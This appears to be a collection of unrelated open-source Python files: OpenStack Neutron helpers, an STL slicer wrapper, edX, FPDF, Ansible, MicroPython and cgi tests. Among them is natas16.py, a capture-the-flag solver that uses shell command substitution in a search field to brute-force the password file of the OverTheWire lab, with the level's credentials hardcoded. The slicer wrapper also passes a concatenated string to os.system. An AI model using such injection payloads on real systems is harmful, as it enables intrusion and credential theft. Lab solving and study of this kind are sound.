"delay": self.HM_DELAY,
"max_retries": self.HM_MAX_RETRIES,
"timeout": self.HM_TIMEOUT}
args.update(healthmonitor_create_args)
return self.clients("neutron").create_health_monitor(
{"health_monitor": args})
@atomic.action_timer("neutron.list_healthmonitors")
def _list_v1_healthmonitors(self, **kwargs):
"""List LB healthmonitors.
This atomic function lists all helthmonitors.
:param kwargs: optional parameters
:returns: neutron lb healthmonitor list
"""
return self.clients("neutron").list_health_monitors(**kwargs)
@atomic.action_timer("neutron.delete_healthmonitor")
def _delete_v1_healthmonitor(self, healthmonitor):
"""Delete neutron healthmonitor.
:param healthmonitor: neutron healthmonitor dict
"""
self.clients("neutron").delete_health_monitor(healthmonitor["id"])
@atomic.action_timer("neutron.update_healthmonitor")
def _update_v1_healthmonitor(self, healthmonitor,
**healthmonitor_update_args):
"""Update neutron healthmonitor.
:param healthmonitor: neutron lb healthmonitor dict
:param healthmonitor_update_args: POST /lb/healthmonitors
update options
:returns: updated neutron lb healthmonitor dict
"""
body = {"health_monitor": healthmonitor_update_args}
return self.clients("neutron").update_health_monitor(
healthmonitor["health_monitor"]["id"], body)
@atomic.action_timer("neutron.create_security_group")
def _create_security_group(self, **security_group_create_args):
"""Create Neutron security-group.
param: security_group_create_args: dict, POST /v2.0/security-groups
request options
return: dict, neutron security-group
"""
security_group_create_args["name"] = self.generate_random_name()
return self.clients("neutron").create_security_group(
{"security_group": security_group_create_args})
@atomic.action_timer("neutron.delete_security_group")
def _delete_security_group(self, security_group):
"""Delete Neutron security group.
param: security_group: dict, neutron security_group
"""
return self.clients("neutron").delete_security_group(
security_group["security_group"]["id"])
@atomic.action_timer("neutron.list_security_groups")
def _list_security_groups(self, **kwargs):
"""Return list of Neutron security groups."""
return self.clients("neutron").list_security_groups(**kwargs)
@atomic.action_timer("neutron.update_security_group")
def _update_security_group(self, security_group,
**security_group_update_args):
"""Update Neutron security-group.
param: security_group: dict, neutron security_group
param: security_group_update_args: dict, POST /v2.0/security-groups
update options
return: dict, updated neutron security-group
"""
security_group_update_args["name"] = self.generate_random_name()
body = {"security_group": security_group_update_args}
return self.clients("neutron").update_security_group(
security_group["security_group"]["id"], body)
|
Arcalder/dli3d
|
refs/heads/master
|
lib/slices.py
|
1
|
#-------------------------------------------------------------------------------
# This file is part of 'DlI3D'.
#
# Copyright (C) 2012 by
# Ariel Calderón, Cesar Campos, Eduardo Escobar, Alvaro Faundez, Alonso Gaete,
# Felipe Gonzalez, Rodrigo Gonzalez, Roberto Riquelme, Tamara Rivera,
# Leonardo Rojas, Maximilian Santander
# DlI3D: https://github.com/afaundez/dli3d
#
# 'DlI3D' is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Foobar is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with 'DlI3D'. If not, see <http://www.gnu.org/licenses/>.
#
#-------------------------------------------------------------------------------
import os
import subprocess
#sys.path.append(os.path.join(os.getcwd(), '..', 'lib'))
def createSlices(height,output,path,step,layer_thickness):
#height=5
#output="trololo.jpg"
#path=os.path.abspath("C:/Users/Leonardo/Documents/Helix.stl")
#print path
#step=0.5
#layer_thickness=10
dir=output[:(-len(output)+output.find('.'))]
#print dir
#if not (os.path.exists(dir)):
# os.mkdir(dir)
os.chdir(os.path.join('..', 'bin', 'slicer'))
print os.getcwd()
#os.system("slice "+path+" -z0,"+str(height)+",0.5 -o "+output)
cmd ="slice "+path+" -z0,"+str(height)+","+str(step)+" -l "+str(layer_thickness)+" --width=800 --height=600 --background=black --core=white -o "+output
print cmd
os.system(cmd)
#height = raw_input("Enter height: ")
#output = raw_input("Enter output: ")
#path = raw_input("Enter stl absolute path: ")
#step = raw_input("Enter step: ")
#layer_thickness = raw_input("Enter layer thickness: ")
#createSlices(height,output,path,step,layer_thickness)
|
40223149/2015cd_midterm
|
refs/heads/master
|
static/Brython3.1.1-20150328-091302/Lib/pickle.py
|
1265
|
from json import *
|
koki-sato/capture-the-flag
|
refs/heads/master
|
write-ups/OverTheWire/Natas/solver/natas16.py
|
1
|
# -*- coding: utf-8 -*-
import string
import requests
URL = 'http://natas16.natas.labs.overthewire.org/?needle=a&submit=Search'
AUTH = ('natas16', 'WaIHEacj63wnNIBROHeqi3p9t0m5nhmh')
def main():
password = ''
while True:
for c in string.printable:
params = { 'needle': "$(grep -E ^" + password + c + " /etc/natas_webpass/natas17)Yankees", 'submit': 'Search' }
r = requests.get(URL, auth=AUTH, params=params)
if not 'Yankees' in r.text:
password += c
print "[+] password: %s" % password
break
if len(password) == 32:
break
if __name__ == '__main__':
try:
main()
except KeyboardInterrupt:
pass
|
dekkersarjan/netcoin-work
|
refs/heads/master
|
share/qt/extract_strings_qt.py
|
2945
|
#!/usr/bin/python
'''
Extract _("...") strings for translation and convert to Qt4 stringdefs so that
they can be picked up by Qt linguist.
'''
from subprocess import Popen, PIPE
import glob
import operator
OUT_CPP="src/qt/bitcoinstrings.cpp"
EMPTY=['""']
def parse_po(text):
"""
Parse 'po' format produced by xgettext.
Return a list of (msgid,msgstr) tuples.
"""
messages = []
msgid = []
msgstr = []
in_msgid = False
in_msgstr = False
for line in text.split('\n'):
line = line.rstrip('\r')
if line.startswith('msgid '):
if in_msgstr:
messages.append((msgid, msgstr))
in_msgstr = False
# message start
in_msgid = True
msgid = [line[6:]]
elif line.startswith('msgstr '):
in_msgid = False
in_msgstr = True
msgstr = [line[7:]]
elif line.startswith('"'):
if in_msgid:
msgid.append(line)
if in_msgstr:
msgstr.append(line)
if in_msgstr:
messages.append((msgid, msgstr))
return messages
files = glob.glob('src/*.cpp') + glob.glob('src/*.h')
# xgettext -n --keyword=_ $FILES
child = Popen(['xgettext','--output=-','-n','--keyword=_'] + files, stdout=PIPE)
(out, err) = child.communicate()
messages = parse_po(out)
f = open(OUT_CPP, 'w')
f.write("""#include <QtGlobal>
// Automatically generated by extract_strings.py
#ifdef __GNUC__
#define UNUSED __attribute__((unused))
#else
#define UNUSED
#endif
""")
f.write('static const char UNUSED *bitcoin_strings[] = {\n')
messages.sort(key=operator.itemgetter(0))
for (msgid, msgstr) in messages:
if msgid != EMPTY:
f.write('QT_TRANSLATE_NOOP("bitcoin-core", %s),\n' % ('\n'.join(msgid)))
f.write('};')
f.close()
|
alikins/ansible
|
refs/heads/devel
|
test/units/modules/network/nxos/test_nxos_vpc_interface.py
|
57
|
# (c) 2016 Red Hat Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible.compat.tests.mock import patch
from ansible.modules.network.nxos import nxos_vpc_interface
from .nxos_module import TestNxosModule, load_fixture, set_module_args
class TestNxosVpcModule(TestNxosModule):
module = nxos_vpc_interface
def setUp(self):
super(TestNxosVpcModule, self).setUp()
self.mock_load_config = patch('ansible.modules.network.nxos.nxos_vpc_interface.load_config')
self.load_config = self.mock_load_config.start()
self.mock_get_config = patch('ansible.modules.network.nxos.nxos_vpc_interface.get_config')
self.get_config = self.mock_get_config.start()
self.mock_run_commands = patch('ansible.modules.network.nxos.nxos_vpc_interface.run_commands')
self.run_commands = self.mock_run_commands.start()
def tearDown(self):
super(TestNxosVpcModule, self).tearDown()
self.mock_load_config.stop()
self.mock_get_config.stop()
self.mock_run_commands.stop()
def load_fixtures(self, commands=None, device=''):
def load_from_file(*args, **kwargs):
module, commands = args
output = list()
for command in commands:
filename = str(command).split(' | ')[0].replace(' ', '_')
output.append(load_fixture('nxos_vpc_interface', filename))
return output
self.run_commands.side_effect = load_from_file
self.load_config.return_value = None
def test_nxos_vpc_interface_absent(self):
set_module_args(dict(portchannel=10, vpc=100, state='absent'))
result = self.execute_module(changed=True)
self.assertEqual(result['commands'], ['interface port-channel10', 'no vpc'])
def test_nxos_vpc_interface_present(self):
set_module_args(dict(portchannel=20, vpc=200, state='present'))
result = self.execute_module(changed=True)
self.assertEqual(result['commands'], ['interface port-channel20', 'vpc 200'])
|
delletenebre/xbmc-addon-kilogramme
|
refs/heads/master
|
script.module.httplib2/lib/httplib2/test/test_no_socket.py
|
306
|
"""Tests for httplib2 when the socket module is missing.
This helps ensure compatibility with environments such as AppEngine.
"""
import os
import sys
import unittest
import httplib2
class MissingSocketTest(unittest.TestCase):
def setUp(self):
self._oldsocks = httplib2.socks
httplib2.socks = None
def tearDown(self):
httplib2.socks = self._oldsocks
def testProxyDisabled(self):
proxy_info = httplib2.ProxyInfo('blah',
'localhost', 0)
client = httplib2.Http(proxy_info=proxy_info)
self.assertRaises(httplib2.ProxiesUnavailableError,
client.request, 'http://localhost:-1/')
|
medallia/aurora
|
refs/heads/master
|
src/main/python/apache/aurora/common/auth/__init__.py
|
296
|
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
|
IndonesiaX/edx-platform
|
refs/heads/master
|
cms/djangoapps/models/settings/course_metadata.py
|
4
|
"""
Django module for Course Metadata class -- manages advanced settings and related parameters
"""
from xblock.fields import Scope
from xmodule.modulestore.django import modulestore
from django.utils.translation import ugettext as _
from django.conf import settings
class CourseMetadata(object):
'''
For CRUD operations on metadata fields which do not have specific editors
on the other pages including any user generated ones.
The objects have no predefined attrs but instead are obj encodings of the
editable metadata.
'''
# The list of fields that wouldn't be shown in Advanced Settings.
# Should not be used directly. Instead the filtered_list method should
# be used if the field needs to be filtered depending on the feature flag.
FILTERED_LIST = [
'cohort_config',
'xml_attributes',
'start',
'end',
'enrollment_start',
'enrollment_end',
'tabs',
'graceperiod',
'show_timezone',
'format',
'graded',
'hide_from_toc',
'pdf_textbooks',
'user_partitions',
'name', # from xblock
'tags', # from xblock
'visible_to_staff_only',
'group_access',
'pre_requisite_courses',
'entrance_exam_enabled',
'entrance_exam_minimum_score_pct',
'entrance_exam_id',
'is_entrance_exam',
'in_entrance_exam',
'language',
'certificates',
'minimum_grade_credit',
'default_time_limit_minutes',
'is_proctored_enabled',
'is_time_limited',
'is_practice_exam',
'exam_review_rules',
'self_paced'
]
@classmethod
def filtered_list(cls):
"""
Filter fields based on feature flag, i.e. enabled, disabled.
"""
# Copy the filtered list to avoid permanently changing the class attribute.
filtered_list = list(cls.FILTERED_LIST)
# Do not show giturl if feature is not enabled.
if not settings.FEATURES.get('ENABLE_EXPORT_GIT'):
filtered_list.append('giturl')
# Do not show edxnotes if the feature is disabled.
if not settings.FEATURES.get('ENABLE_EDXNOTES'):
filtered_list.append('edxnotes')
# Do not show video_upload_pipeline if the feature is disabled.
if not settings.FEATURES.get('ENABLE_VIDEO_UPLOAD_PIPELINE'):
filtered_list.append('video_upload_pipeline')
# Do not show facebook_url if the feature is disabled.
if not settings.FEATURES.get('ENABLE_MOBILE_SOCIAL_FACEBOOK_FEATURES'):
filtered_list.append('facebook_url')
# Do not show social sharing url field if the feature is disabled.
if (not hasattr(settings, 'SOCIAL_SHARING_SETTINGS') or
not getattr(settings, 'SOCIAL_SHARING_SETTINGS', {}).get("CUSTOM_COURSE_URLS")):
filtered_list.append('social_sharing_url')
# Do not show teams configuration if feature is disabled.
if not settings.FEATURES.get('ENABLE_TEAMS'):
filtered_list.append('teams_configuration')
if not settings.FEATURES.get('ENABLE_VIDEO_BUMPER'):
filtered_list.append('video_bumper')
# Do not show enable_ccx if feature is not enabled.
if not settings.FEATURES.get('CUSTOM_COURSES_EDX'):
filtered_list.append('enable_ccx')
return filtered_list
@classmethod
def fetch(cls, descriptor):
"""
Fetch the key:value editable course details for the given course from
persistence and return a CourseMetadata model.
"""
result = {}
metadata = cls.fetch_all(descriptor)
for key, value in metadata.iteritems():
if key in cls.filtered_list():
continue
result[key] = value
return result
@classmethod
def fetch_all(cls, descriptor):
"""
Fetches all key:value pairs from persistence and returns a CourseMetadata model.
"""
result = {}
for field in descriptor.fields.values():
if field.scope != Scope.settings:
continue
result[field.name] = {
'value': field.read_json(descriptor),
'display_name': _(field.display_name), # pylint: disable=translation-of-non-string
'help': _(field.help), # pylint: disable=translation-of-non-string
'deprecated': field.runtime_options.get('deprecated', False)
}
return result
@classmethod
def update_from_json(cls, descriptor, jsondict, user, filter_tabs=True):
"""
Decode the json into CourseMetadata and save any changed attrs to the db.
Ensures none of the fields are in the blacklist.
"""
filtered_list = cls.filtered_list()
# Don't filter on the tab attribute if filter_tabs is False.
if not filter_tabs:
filtered_list.remove("tabs")
# Validate the values before actually setting them.
key_values = {}
for key, model in jsondict.iteritems():
# should it be an error if one of the filtered list items is in the payload?
if key in filtered_list:
continue
try:
val = model['value']
if hasattr(descriptor, key) and getattr(descriptor, key) != val:
key_values[key] = descriptor.fields[key].from_json(val)
except (TypeError, ValueError) as err:
raise ValueError(_("Incorrect format for field '{name}'. {detailed_message}").format(
name=model['display_name'], detailed_message=err.message))
return cls.update_from_dict(key_values, descriptor, user)
@classmethod
def validate_and_update_from_json(cls, descriptor, jsondict, user, filter_tabs=True):
"""
Validate the values in the json dict (validated by xblock fields from_json method)
If all fields validate, go ahead and update those values on the object and return it without
persisting it to the DB.
If not, return the error objects list.
Returns:
did_validate: whether values pass validation or not
errors: list of error objects
result: the updated course metadata or None if error
"""
filtered_list = cls.filtered_list()
if not filter_tabs:
filtered_list.remove("tabs")
filtered_dict = dict((k, v) for k, v in jsondict.iteritems() if k not in filtered_list)
did_validate = True
errors = []
key_values = {}
updated_data = None
for key, model in filtered_dict.iteritems():
try:
val = model['value']
if hasattr(descriptor, key) and getattr(descriptor, key) != val:
key_values[key] = descriptor.fields[key].from_json(val)
except (TypeError, ValueError) as err:
did_validate = False
errors.append({'message': err.message, 'model': model})
# If did validate, go ahead and update the metadata
if did_validate:
updated_data = cls.update_from_dict(key_values, descriptor, user, save=False)
return did_validate, errors, updated_data
@classmethod
def update_from_dict(cls, key_values, descriptor, user, save=True):
"""
Update metadata descriptor from key_values. Saves to modulestore if save is true.
"""
for key, value in key_values.iteritems():
setattr(descriptor, key, value)
if save and len(key_values):
modulestore().update_item(descriptor, user.id)
return cls.fetch(descriptor)
|
shashisp/blumix-webpy
|
refs/heads/master
|
app/gluon/contrib/fpdf/html.py
|
41
|
# -*- coding: latin-1 -*-
"HTML Renderer for FPDF.py"
__author__ = "Mariano Reingart <reingart@gmail.com>"
__copyright__ = "Copyright (C) 2010 Mariano Reingart"
__license__ = "LGPL 3.0"
# Inspired by tuto5.py and several examples from fpdf.org, html2fpdf, etc.
from fpdf import FPDF
from HTMLParser import HTMLParser
DEBUG = False
def px2mm(px):
return int(px)*25.4/72.0
def hex2dec(color = "#000000"):
if color:
r = int(color[1:3], 16)
g = int(color[3:5], 16)
b = int(color[5:7], 16)
return r, g, b
class HTML2FPDF(HTMLParser):
"Render basic HTML to FPDF"
def __init__(self, pdf, image_map=None):
HTMLParser.__init__(self)
self.style = {}
self.pre = False
self.href = ''
self.align = ''
self.page_links = {}
self.font = None
self.font_stack = []
self.pdf = pdf
self.image_map = image_map or (lambda src: src)
self.r = self.g = self.b = 0
self.indent = 0
self.bullet = []
self.set_font("times", 12)
self.font_face = "times" # initialize font
self.color = 0 #initialize font color
self.table = None # table attributes
self.table_col_width = None # column (header) widths
self.table_col_index = None # current column index
self.td = None # cell attributes
self.th = False # header enabled
self.tr = None
self.theader = None # table header cells
self.tfooter = None # table footer cells
self.thead = None
self.tfoot = None
self.theader_out = self.tfooter_out = False
self.hsize = dict(h1=2, h2=1.5, h3=1.17, h4=1, h5=0.83, h6=0.67)
def width2mm(self, length):
if length[-1]=='%':
total = self.pdf.w - self.pdf.r_margin - self.pdf.l_margin
if self.table['width'][-1]=='%':
total *= int(self.table['width'][:-1])/100.0
return int(length[:-1]) * total / 101.0
else:
return int(length) / 6.0
def handle_data(self, txt):
if self.td is not None: # drawing a table?
if 'width' not in self.td and 'colspan' not in self.td:
try:
l = [self.table_col_width[self.table_col_index]]
except IndexError:
raise RuntimeError("Table column/cell width not specified, unable to continue")
elif 'colspan' in self.td:
i = self.table_col_index
colspan = int(self.td['colspan'])
l = self.table_col_width[i:i+colspan]
else:
l = [self.td.get('width','240')]
w = sum([self.width2mm(lenght) for lenght in l])
h = int(self.td.get('height', 0)) / 4 or self.h*1.30
self.table_h = h
border = int(self.table.get('border', 0))
if not self.th:
align = self.td.get('align', 'L')[0].upper()
border = border and 'LR'
else:
self.set_style('B',True)
border = border or 'B'
align = self.td.get('align', 'C')[0].upper()
bgcolor = hex2dec(self.td.get('bgcolor', self.tr.get('bgcolor', '')))
# parsing table header/footer (drawn later):
if self.thead is not None:
self.theader.append(((w,h,txt,border,0,align), bgcolor))
if self.tfoot is not None:
self.tfooter.append(((w,h,txt,border,0,align), bgcolor))
# check if reached end of page, add table footer and header:
height = h + (self.tfooter and self.tfooter[0][0][1] or 0)
if self.pdf.y+height>self.pdf.page_break_trigger and not self.th:
self.output_table_footer()
self.pdf.add_page()
self.theader_out = self.tfooter_out = False
if self.tfoot is None and self.thead is None:
if not self.theader_out:
self.output_table_header()
self.box_shadow(w, h, bgcolor)
if DEBUG: print "td cell", self.pdf.x, w, txt, "*"
self.pdf.cell(w,h,txt,border,0,align)
elif self.table is not None:
# ignore anything else than td inside a table
pass
elif self.align:
if DEBUG: print "cell", txt, "*"
self.pdf.cell(0,self.h,txt,0,1,self.align[0].upper(), self.href)
else:
txt = txt.replace("\n"," ")
if self.href:
self.put_link(self.href,txt)
else:
if DEBUG: print "write", txt, "*"
self.pdf.write(self.h,txt)
def box_shadow(self, w, h, bgcolor):
if DEBUG: print "box_shadow", w, h, bgcolor
if bgcolor:
fill_color = self.pdf.fill_color
self.pdf.set_fill_color(*bgcolor)
self.pdf.rect(self.pdf.x, self.pdf.y, w, h, 'F')
self.pdf.fill_color = fill_color
def output_table_header(self):
if self.theader:
b = self.b
x = self.pdf.x
self.pdf.set_x(self.table_offset)
self.set_style('B',True)
for cell, bgcolor in self.theader:
self.box_shadow(cell[0], cell[1], bgcolor)
self.pdf.cell(*cell)
self.set_style('B',b)
self.pdf.ln(self.theader[0][0][1])
self.pdf.set_x(self.table_offset)
#self.pdf.set_x(x)
self.theader_out = True
def output_table_footer(self):
if self.tfooter:
x = self.pdf.x
self.pdf.set_x(self.table_offset)
#TODO: self.output_table_sep()
for cell, bgcolor in self.tfooter:
self.box_shadow(cell[0], cell[1], bgcolor)
self.pdf.cell(*cell)
self.pdf.ln(self.tfooter[0][0][1])
self.pdf.set_x(x)
if int(self.table.get('border', 0)):
self.output_table_sep()
self.tfooter_out = True
def output_table_sep(self):
self.pdf.set_x(self.table_offset)
x1 = self.pdf.x
y1 = self.pdf.y
w = sum([self.width2mm(lenght) for lenght in self.table_col_width])
self.pdf.line(x1,y1,x1+w,y1)
def handle_starttag(self, tag, attrs):
attrs = dict(attrs)
if DEBUG: print "STARTTAG", tag, attrs
if tag=='b' or tag=='i' or tag=='u':
self.set_style(tag,1)
if tag=='a':
self.href=attrs['href']
if tag=='br':
self.pdf.ln(5)
if tag=='p':
self.pdf.ln(5)
if attrs:
if attrs: self.align = attrs.get('align')
if tag in self.hsize:
k = self.hsize[tag]
self.pdf.ln(5*k)
self.pdf.set_text_color(150,0,0)
self.pdf.set_font_size(12 * k)
if attrs: self.align = attrs.get('align')
if tag=='hr':
self.put_line()
if tag=='pre':
self.pdf.set_font('Courier','',11)
self.pdf.set_font_size(11)
self.set_style('B',False)
self.set_style('I',False)
self.pre = True
if tag=='blockquote':
self.set_text_color(100,0,45)
self.pdf.ln(3)
if tag=='ul':
self.indent+=1
self.bullet.append('\x95')
if tag=='ol':
self.indent+=1
self.bullet.append(0)
if tag=='li':
self.pdf.ln(self.h+2)
self.pdf.set_text_color(190,0,0)
bullet = self.bullet[self.indent-1]
if not isinstance(bullet, basestring):
bullet += 1
self.bullet[self.indent-1] = bullet
bullet = "%s. " % bullet
self.pdf.write(self.h,'%s%s ' % (' '*5*self.indent, bullet))
self.set_text_color()
if tag=='font':
# save previous font state:
self.font_stack.append((self.font_face, self.font_size, self.color))
if 'color' in attrs:
self.color = hex2dec(attrs['color'])
self.set_text_color(*color)
self.color = color
if 'face' in attrs:
face = attrs.get('face').lower()
self.pdf.set_font(face)
self.font_face = face
if 'size' in attrs:
size = int(attrs.get('size'))
self.pdf.set_font(self.font_face, size=int(size))
self.font_size = size
if tag=='table':
self.table = dict([(k.lower(), v) for k,v in attrs.items()])
if not 'width' in self.table:
self.table['width'] = '100%'
if self.table['width'][-1]=='%':
w = self.pdf.w - self.pdf.r_margin - self.pdf.l_margin
w *= int(self.table['width'][:-1])/100.0
self.table_offset = (self.pdf.w-w)/2.0
self.table_col_width = []
self.theader_out = self.tfooter_out = False
self.theader = []
self.tfooter = []
self.thead = None
self.tfoot = None
self.table_h = 0
self.pdf.ln()
if tag=='tr':
self.tr = dict([(k.lower(), v) for k,v in attrs.items()])
self.table_col_index = 0
self.pdf.set_x(self.table_offset)
if tag=='td':
self.td = dict([(k.lower(), v) for k,v in attrs.items()])
if tag=='th':
self.td = dict([(k.lower(), v) for k,v in attrs.items()])
self.th = True
if 'width' in self.td:
self.table_col_width.append(self.td['width'])
if tag=='thead':
self.thead = {}
if tag=='tfoot':
self.tfoot = {}
if tag=='img':
if 'src' in attrs:
x = self.pdf.get_x()
y = self.pdf.get_y()
w = px2mm(attrs.get('width', 0))
h = px2mm(attrs.get('height',0))
if self.align and self.align[0].upper() == 'C':
x = (self.pdf.w-x)/2.0 - w/2.0
self.pdf.image(self.image_map(attrs['src']),
x, y, w, h, link=self.href)
self.pdf.set_x(x+w)
self.pdf.set_y(y+h)
if tag=='b' or tag=='i' or tag=='u':
self.set_style(tag, True)
if tag=='center':
self.align = 'Center'
def handle_endtag(self, tag):
#Closing tag
if DEBUG: print "ENDTAG", tag
if tag=='h1' or tag=='h2' or tag=='h3' or tag=='h4':
self.pdf.ln(6)
self.set_font()
self.set_style()
self.align = None
if tag=='pre':
self.pdf.set_font(self.font or 'Times','',12)
self.pdf.set_font_size(12)
self.pre=False
if tag=='blockquote':
self.set_text_color(0,0,0)
self.pdf.ln(3)
if tag=='strong':
tag='b'
if tag=='em':
tag='i'
if tag=='b' or tag=='i' or tag=='u':
self.set_style(tag, False)
if tag=='a':
self.href=''
if tag=='p':
self.align=''
if tag in ('ul', 'ol'):
self.indent-=1
self.bullet.pop()
if tag=='table':
if not self.tfooter_out:
self.output_table_footer()
self.table = None
self.th = False
self.theader = None
self.tfooter = None
self.pdf.ln()
if tag=='thead':
self.thead = None
if tag=='tfoot':
self.tfoot = None
if tag=='tbody':
# draw a line separator between table bodies
self.pdf.set_x(self.table_offset)
self.output_table_sep()
if tag=='tr':
h = self.table_h
if self.tfoot is None:
self.pdf.ln(h)
self.tr = None
if tag=='td' or tag=='th':
if self.th:
if DEBUG: print "revert style"
self.set_style('B', False) # revert style
self.table_col_index += int(self.td.get('colspan','1'))
self.td = None
self.th = False
if tag=='font':
# recover last font state
face, size, color = self.font_stack.pop()
if face:
self.pdf.set_text_color(0,0,0)
self.color = None
self.set_font(face, size)
self.font = None
if tag=='center':
self.align = None
def set_font(self, face=None, size=None):
if face:
self.font_face = face
if size:
self.font_size = size
self.h = size / 72.0*25.4
if DEBUG: print "H", self.h
self.pdf.set_font(self.font_face or 'times','',12)
self.pdf.set_font_size(self.font_size or 12)
self.set_style('u', False)
self.set_style('b', False)
self.set_style('i', False)
self.set_text_color()
def set_style(self, tag=None, enable=None):
#Modify style and select corresponding font
if tag:
t = self.style.get(tag.lower())
self.style[tag.lower()] = enable
style=''
for s in ('b','i','u'):
if self.style.get(s):
style+=s
if DEBUG: print "SET_FONT_STYLE", style
self.pdf.set_font('',style)
def set_text_color(self, r=None, g=0, b=0):
if r is None:
self.pdf.set_text_color(self.r,self.g,self.b)
else:
self.pdf.set_text_color(r, g, b)
self.r = r
self.g = g
self.b = b
def put_link(self, url, txt):
#Put a hyperlink
self.set_text_color(0,0,255)
self.set_style('u', True)
self.pdf.write(5,txt,url)
self.set_style('u', False)
self.set_text_color(0)
def put_line(self):
self.pdf.ln(2)
self.pdf.line(self.pdf.get_x(),self.pdf.get_y(),self.pdf.get_x()+187,self.pdf.get_y())
self.pdf.ln(3)
class HTMLMixin(object):
def write_html(self, text, image_map=None):
"Parse HTML and convert it to PDF"
h2p = HTML2FPDF(self, image_map)
h2p.feed(text)
|
popazerty/bnigma2
|
refs/heads/master
|
lib/python/Components/Converter/ValueBitTest.py
|
165
|
from Converter import Converter
from Components.Element import cached
class ValueBitTest(Converter, object):
def __init__(self, arg):
Converter.__init__(self, arg)
self.value = int(arg)
@cached
def getBoolean(self):
return self.source.value & self.value and True or False
boolean = property(getBoolean)
|
alexbruy/QGIS
|
refs/heads/master
|
scripts/qgis_fixes/fix_print_with_import.py
|
77
|
from libfuturize.fixes.fix_print_with_import import FixPrintWithImport as FixPrintWithImportOrig
from lib2to3.fixer_util import Node, Leaf, syms, find_indentation
import re
class FixPrintWithImport(FixPrintWithImportOrig):
def transform(self, node, results):
if "fix_print_with_import" in node.prefix:
return node
r = super(FixPrintWithImport, self).transform(node, results)
if not r or r == node:
return r
if not r.prefix:
indentation = find_indentation(node)
r.prefix = "# fix_print_with_import\n" + indentation
else:
r.prefix = re.sub('([ \t]*$)', r'\1# fix_print_with_import\n\1', r.prefix)
return r
|
matthewelse/micropython
|
refs/heads/emscripten
|
tests/micropython/viper_ptr8_store.py
|
93
|
# test ptr8 type
@micropython.viper
def set(dest:ptr8, val:int):
dest[0] = val
@micropython.viper
def set1(dest:ptr8, val:int):
dest[1] = val
@micropython.viper
def memset(dest:ptr8, val:int, n:int):
for i in range(n):
dest[i] = val
@micropython.viper
def memset2(dest_in, val:int):
dest = ptr8(dest_in)
n = int(len(dest_in))
for i in range(n):
dest[i] = val
b = bytearray(4)
print(b)
set(b, 41)
print(b)
set1(b, 42)
print(b)
memset(b, 43, len(b))
print(b)
memset2(b, 44)
print(b)
|
zephyrplugins/zephyr
|
refs/heads/master
|
zephyr.plugin.jython/jython2.5.2rc3/Lib/test/test_cgi.py
|
24
|
from test.test_support import verify, verbose
import cgi
import os
import sys
import tempfile
from StringIO import StringIO
class HackedSysModule:
# The regression test will have real values in sys.argv, which
# will completely confuse the test of the cgi module
argv = []
stdin = sys.stdin
cgi.sys = HackedSysModule()
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO
class ComparableException:
def __init__(self, err):
self.err = err
def __str__(self):
return str(self.err)
def __cmp__(self, anExc):
if not isinstance(anExc, Exception):
return -1
x = cmp(self.err.__class__, anExc.__class__)
if x != 0:
return x
return cmp(self.err.args, anExc.args)
def __getattr__(self, attr):
return getattr(self.err, attr)
def do_test(buf, method):
env = {}
if method == "GET":
fp = None
env['REQUEST_METHOD'] = 'GET'
env['QUERY_STRING'] = buf
elif method == "POST":
fp = StringIO(buf)
env['REQUEST_METHOD'] = 'POST'
env['CONTENT_TYPE'] = 'application/x-www-form-urlencoded'
env['CONTENT_LENGTH'] = str(len(buf))
else:
raise ValueError, "unknown method: %s" % method
try:
return cgi.parse(fp, env, strict_parsing=1)
except StandardError, err:
return ComparableException(err)
# A list of test cases. Each test case is a a two-tuple that contains
# a string with the query and a dictionary with the expected result.
parse_qsl_test_cases = [
("", []),
("&", []),
("&&", []),
("=", [('', '')]),
("=a", [('', 'a')]),
("a", [('a', '')]),
("a=", [('a', '')]),
("a=", [('a', '')]),
("&a=b", [('a', 'b')]),
("a=a+b&b=b+c", [('a', 'a b'), ('b', 'b c')]),
("a=1&a=2", [('a', '1'), ('a', '2')]),
]
parse_strict_test_cases = [
("", ValueError("bad query field: ''")),
("&", ValueError("bad query field: ''")),
("&&", ValueError("bad query field: ''")),
(";", ValueError("bad query field: ''")),
(";&;", ValueError("bad query field: ''")),
# Should the next few really be valid?
("=", {}),
("=&=", {}),
("=;=", {}),
# This rest seem to make sense
("=a", {'': ['a']}),
("&=a", ValueError("bad query field: ''")),
("=a&", ValueError("bad query field: ''")),
("=&a", ValueError("bad query field: 'a'")),
("b=a", {'b': ['a']}),
("b+=a", {'b ': ['a']}),
("a=b=a", {'a': ['b=a']}),
("a=+b=a", {'a': [' b=a']}),
("&b=a", ValueError("bad query field: ''")),
("b&=a", ValueError("bad query field: 'b'")),
("a=a+b&b=b+c", {'a': ['a b'], 'b': ['b c']}),
("a=a+b&a=b+a", {'a': ['a b', 'b a']}),
("x=1&y=2.0&z=2-3.%2b0", {'x': ['1'], 'y': ['2.0'], 'z': ['2-3.+0']}),
("x=1;y=2.0&z=2-3.%2b0", {'x': ['1'], 'y': ['2.0'], 'z': ['2-3.+0']}),
("x=1;y=2.0;z=2-3.%2b0", {'x': ['1'], 'y': ['2.0'], 'z': ['2-3.+0']}),
